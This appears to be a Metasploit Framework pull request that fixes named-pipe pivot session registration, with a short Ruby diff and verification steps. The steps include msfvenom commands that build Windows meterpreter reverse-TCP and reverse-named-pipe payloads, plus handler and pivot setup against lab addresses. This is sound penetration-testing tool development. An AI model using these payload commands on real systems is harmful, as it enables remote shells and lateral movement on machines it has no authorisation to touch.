### PR TITLE
Fix named pipe pivoting

### DIFF
--- a/lib/metasploit/framework/data_service/remote/http/remote_session_data_service.rb
+++ b/lib/metasploit/framework/data_service/remote/http/remote_session_data_service.rb
@@ -13,6 +13,7 @@ module RemoteSessionDataService
 
   def report_session(opts)
     session = opts[:session]
+    session.workspace = session.workspace || opts[:workspace]
     if (session.kind_of? Msf::Session)
       opts = SessionDataProxy.convert_msf_session_to_hash(session)
     elsif (opts[:host])

--- a/lib/rex/post/meterpreter/pivot.rb
+++ b/lib/rex/post/meterpreter/pivot.rb
@@ -146,8 +146,18 @@ class Pivot
     self.pivoted_session = listener.session_class.new(nil, opts)
 
     self.pivoted_session.framework = self.client.framework
-    self.pivoted_session.bootstrap({'AutoVerifySessionTimeout' => 30})
-    self.client.framework.sessions.register(self.pivoted_session)
+    registration = Proc.new do
+      self.pivoted_session.bootstrap({'AutoVerifySessionTimeout' => 30})
+      self.client.framework.sessions.register(self.pivoted_session)
+
+      begin
+        self.client.framework.events.on_session_open(self.pivoted_session)
+      rescue ::Exception => e
+        wlog("Exception in on_session_open event handler: #{e.class}: #{e}")
+        wlog("Call Stack\n#{e.backtrace.join("\n")}")
+      end
+    end
+    self.client.framework.sessions.schedule registration
   end
 
 protected


### PR DESCRIPTION
I previously broke this functionality with this PR https://github.com/rapid7/metasploit-framework/pull/14844

Resolves #15457

Verification steps taken from here: https://github.com/rapid7/metasploit-framework/pull/14028

## Verification

Generate reverse tcp payload:

```
bundle exec ./msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.222.1 LPORT=4444 -o reverse_shell.exe -f exe -a x64
```

Create listener:

```
use multi/handler
set payload payload/windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.222.1
set LPORT 4444
run
````

OR:


```
use payload/windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.222.1
set LPORT 4444
to_handler
````

Create the pipe:

```
sessions -i -1
pivot add -t pipe -l 192.168.222.155 -n mypipe -a x64 -p windows
```

Ensure the pivot was created successfully:

```
meterpreter > pivot list

Currently active pivot listeners
================================

    Id                                URL                            Stage
    --                                ---                            -----
    c134bb9f27dc4089b2f56b3ad25c4970  pipe://192.168.222.155/mypipe  x64/windows


```

Generate the reverse_named_pipe payload:e

```
bundle exec ./msfvenom -p windows/x64/meterpreter/reverse_named_pipe PIPEHOST=192.168.222.155 PIPENAME=mypipe -o pipe.exe -f exe -a x64
```

Execute the payload on the target host; you should now see a session opened, run `sessions -x` on the attacker machine to verify.

